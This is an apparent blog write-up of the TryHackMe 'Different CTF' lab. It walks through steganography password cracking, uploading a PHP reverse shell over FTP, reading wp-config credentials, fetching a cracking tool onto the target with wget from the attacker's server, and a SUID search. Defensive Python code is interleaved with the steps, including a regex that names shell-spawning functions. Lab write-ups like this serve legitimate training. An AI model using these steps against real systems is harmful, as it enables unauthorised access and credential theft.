Different CTF Writeup

YAnil Sec
5 min read · Aug 19, 2021

Hello everyone. Today I will explain how you can hack the “Different CTF” machine. Let’s start hacking this machine.

nmap -sN -sV <ip>

With Nmap you can enumerate open ports. I tried logging in to FTP as anonymous, but it is not allowed. Let’s check the website.

This site uses WordPress. WordPress needs a domain name to show the website properly. I will add this IP address to the /etc/hosts file. This way I can enter the site with this domain. If you look at the page source you can see the domain.

Now it looks better. I want to scan for hidden directories with gobuster.

gobuster dir -u http://ip/ -w <wordlist-path>

Let’s check the <hidden> directory.

I downloaded these files with the wget command.

wget http://ip/<hidden>/wordlist.txt

wget http://ip/<hidden>/austrailian-bulldog-ant.jpg

I think there is a hidden message inside the image. I tried to open the message with steghide, but I need a password. I will try to crack the password with wordlist.txt. You can crack the password with “Stegcracker”.

Stegcracker usage:

stegcracker <file> <wordlist>

I cracked the password. I extracted the file with steghide and found a base64-encoded string.

steghide --extract -sf austrailian-bulldog-ant.jpg

I found the FTP username and password.

I can see the web files. I think I can put a reverse shell here and execute it from the website.

You can download a PHP reverse shell from Pentestmonkey’s GitHub page.

I edited the reverse shell file permissions with chmod (chmod 777 = all users can read, write and execute).

Let’s execute the shell from the website.

Oh, we got a problem. I think this website has a subdomain and we put the reverse shell inside the subdomain. I want to check the web files in FTP.
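From the defender’s side, the step above (a PHP file dropped into the web root over FTP and then requested through the web server) is one of the easiest things to catch: a reverse shell has to spawn a process and talk to a socket, so the file names those functions. The following is an added example, not code from the writeup or from the box; it walks a web root and reports PHP files that combine several such calls. The sample files it builds are constructed for the demonstration and are not the machine’s real files.

```python
"""Flag PHP files in a web root that call process-spawning or raw-socket
functions, the pattern a dropped reverse shell follows.  Added example with
constructed sample files; not part of the original writeup."""
import re
import tempfile
from pathlib import Path

# Functions a reverse shell needs: spawn a process and/or open a raw socket.
SUSPICIOUS = re.compile(
    r"\b(fsockopen|proc_open|popen|shell_exec|passthru|pcntl_exec|exec|system)\s*\(",
    re.IGNORECASE,
)


def scan_php_file(path: Path) -> list:
    """Return the distinct suspicious function names found in one PHP file."""
    text = path.read_text(errors="replace")
    return sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(text)})


def scan_webroot(root: Path, min_hits: int = 2) -> dict:
    """Walk ``root`` and map each .php file (relative path) to its suspicious
    calls when it has at least ``min_hits`` distinct ones.  A lone system()
    call is common in legitimate plugins; socket plus process spawn together
    is the shell pattern, so the default threshold is two."""
    findings = {}
    for path in root.rglob("*.php"):
        hits = scan_php_file(path)
        if len(hits) >= min_hits:
            findings[str(path.relative_to(root))] = hits
    return findings


# Constructed sample web root (not files from the machine in the writeup):
# a plain page, a plugin that shells out once, and a dropped file that both
# opens a socket and spawns a process.
SAMPLE_FILES = {
    "index.php": "<?php echo 'hello'; ?>",
    "wp-content/plugins/backup/run.php": "<?php system('tar czf backup.tgz .'); ?>",
    "wp-content/uploads/img.php": (
        "<?php $s = fsockopen($host, $port); "
        "$p = proc_open($cmd, $spec, $pipes); ?>"
    ),
}


def build_sample_root() -> Path:
    """Write SAMPLE_FILES into a fresh temporary directory and return it."""
    root = Path(tempfile.mkdtemp())
    for rel, body in SAMPLE_FILES.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    for rel, hits in scan_webroot(build_sample_root()).items():
        print(rel, hits)   # wp-content/uploads/img.php ['fsockopen', 'proc_open']
```

Run it against the real document root (for example `scan_webroot(Path("/var/www/html"))`) from a cron job or a file-integrity hook; anything new under an uploads directory that scores two or more deserves a look.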

I can see the wp-config file. This file holds the database configuration and I want to read it.

I found a username and password. I can log in to the phpMyAdmin panel with this username and password.

I want to check phpmyadmin1’s files.

I found this under the “wp-options” header. Let’s add the subdomain to the /etc/hosts file.

Let’s try again to execute the reverse shell from the website.

I need a more powerful shell.

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

ctrl^z

stty raw -echo && fg

<enter>

stty <your rows and columns value>

Let’s find the web flag.

Good job! Now I must log in as the hakanbey user for the user flag.

I will use the sucrack tool to crack hakanbey’s password (you can download it here). I think we should add 123*** to all lines of the wordlist file, because the FTP service password and the image password both contain 123***.

I created a Python file. When I execute this file, it adds 123*** to all lines.

python <file-name>

I downloaded sucrack to my own machine and created a web server with Python on my own machine.

python -m SimpleHTTPServer

I downloaded the sucrack file to the shell (download it to the /tmp folder, because you don’t need to be the hakanbey user or root to write there).

wget http://<ip>/<file-name>

Let’s install the sucrack tool.

dpkg -x <filename> <foldername>

cd <foldername>/usr/bin

./sucrack -u hakanbey <wordlist>

(You can see the help menu with “./sucrack -h”.)

Now I can log in as the hakanbey user.

I want to look for SUID bits.

find / -perm -u=s -type f 2>/dev/null

I can see “/usr/bin/binary”; this is strange. I will execute the binary file with ltrace, so the file runs under ltrace.
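The reason /usr/bin/binary stands out is that a stock system has a short, stable list of SUID executables, so anything outside that list is worth a look. The block below is an added example, not part of the writeup, that turns the `find / -perm -u=s -type f` check into a baseline comparison a defender can run periodically. The baseline set and the sample mode listing are constructed for the demonstration; a real baseline is captured from a clean build of the same image.

```python
"""Audit SUID binaries against a known-good baseline so a stray entry such as
/usr/bin/binary stands out.  Added example, not part of the original writeup;
the baseline set and the sample listing below are constructed."""
import os
import stat

# Paths that legitimately carry the SUID bit on a typical Debian/Ubuntu host.
# Constructed baseline for illustration; take a real one from a clean build.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/gpasswd",
}


def unexpected_suid(modes: dict, baseline: set = BASELINE) -> list:
    """``modes`` maps path -> st_mode int (as lstat() reports it).  Return the
    SUID *regular files* that are not in ``baseline``, sorted.  Directories
    and symlinks are skipped, matching find's ``-type f``."""
    found = []
    for path, mode in modes.items():
        if stat.S_ISREG(mode) and mode & stat.S_ISUID and path not in baseline:
            found.append(path)
    return sorted(found)


def collect_modes(root: str = "/") -> dict:
    """Walk the filesystem (the live equivalent of find / -perm -u=s -type f)
    and return path -> st_mode, silently skipping entries we cannot stat."""
    modes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                modes[p] = os.lstat(p).st_mode
            except OSError:
                continue
    return modes


# Constructed sample listing: mode values in the form lstat() returns them.
SAMPLE_MODES = {
    "/usr/bin/passwd": stat.S_IFREG | stat.S_ISUID | 0o755,
    "/usr/bin/sudo":   stat.S_IFREG | stat.S_ISUID | 0o755,
    "/usr/bin/ls":     stat.S_IFREG | 0o755,                 # not SUID
    "/usr/bin/binary": stat.S_IFREG | stat.S_ISUID | 0o755,  # not in baseline
    "/tmp/suid_dir":   stat.S_IFDIR | stat.S_ISUID | 0o755,  # directory, ignored
}


if __name__ == "__main__":
    # Offline demonstration on the constructed listing.
    print(unexpected_suid(SAMPLE_MODES))   # ['/usr/bin/binary']
    # Live run (needs read access to the tree): unexpected_suid(collect_modes("/"))
```

Feeding `collect_modes("/")` into `unexpected_suid` gives the live result; storing the output and diffing it against the previous run is the usual way to catch a SUID bit that appeared after the system was built.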

When I execute this file on the system and enter the right answer, it gives me hint.txt and root.jpg.

It says “open image with hexeditor and look 00000020”, and I can see “CyberChef”, so I should decode the hash. Again I created a web server with Python and downloaded root.jpg to my own machine.

I looked at the hint inside TryHackMe, and I should decode with From Hex, To Base85.
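The two steps just described (read the bytes at offset 0x20 of the image, then run the CyberChef recipe From Hex, To Base85) can be reproduced without a hex editor. The code below is an added example, not part of the writeup, and root.jpg itself is not on the page, so it builds a constructed stand-in file with a hex string at that offset. One caveat it makes explicit: “Base85” is a family of alphabets. CyberChef’s default Standard alphabet is the Ascii85 one that Python’s `base64.a85encode` uses, while `base64.b85encode` uses the RFC 1924 alphabet, so the example returns both.

```python
"""Pull the ASCII hex that sits at a fixed offset of an image, convert it from
hex and re-encode it as Base85, the CyberChef recipe (From Hex, To Base85) the
writeup describes.  Added example, not part of the original writeup; root.jpg
is not on the page, so a constructed stand-in file is built below."""
import base64
import tempfile
from pathlib import Path

HEX_CHARS = set("0123456789abcdefABCDEF")


def hex_run_at(path: Path, offset: int = 0x20, limit: int = 256) -> str:
    """Return the run of ASCII hex digits starting at ``offset`` in ``path``
    (what you would see selected in a hex editor at that address)."""
    data = path.read_bytes()[offset:offset + limit]
    out = []
    for b in data:
        if chr(b) in HEX_CHARS:
            out.append(chr(b))
        else:
            break   # first non-hex byte ends the run
    return "".join(out)


def from_hex_to_base85(hex_text: str) -> dict:
    """Apply From Hex, then To Base85 under both common alphabets.
    'standard' = Ascii85 ('!'..'u'), CyberChef's default; 'rfc1924' = the
    alphabet Python's b85encode uses.  Tools disagree, so show both."""
    raw = bytes.fromhex(hex_text)
    return {
        "standard": base64.a85encode(raw).decode(),
        "rfc1924": base64.b85encode(raw).decode(),
    }


def build_sample_image(hex_payload: str) -> Path:
    """Constructed JPEG-like file: SOI + APP0 + 'JFIF\\0', zero padding up to
    offset 0x20, the hex text, a newline, then filler.  Only the offset
    matters for this demonstration; it is not a valid picture."""
    header = bytes.fromhex("ffd8ffe000104a46494600")
    body = header.ljust(0x20, b"\x00") + hex_payload.encode() + b"\n" + b"\xff" * 16
    p = Path(tempfile.mkdtemp()) / "root.jpg"
    p.write_bytes(body)
    return p


if __name__ == "__main__":
    img = build_sample_image("48656c6c6f")          # constructed: hex of 'Hello'
    found = hex_run_at(img)
    print(found)                                    # 48656c6c6f
    print(from_hex_to_base85(found))                # {'standard': '87cURDZ', ...}
```

For the real file you would call `hex_run_at(Path("root.jpg"))`; if the run at 0x20 is empty, the text is not plain ASCII hex at that address and a hex editor view is needed to see what is actually there.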

I found the root password; this is so good.

Interesting room, you can shoot the sun.

Thanks for reading my writeup.

-YAnil Sec
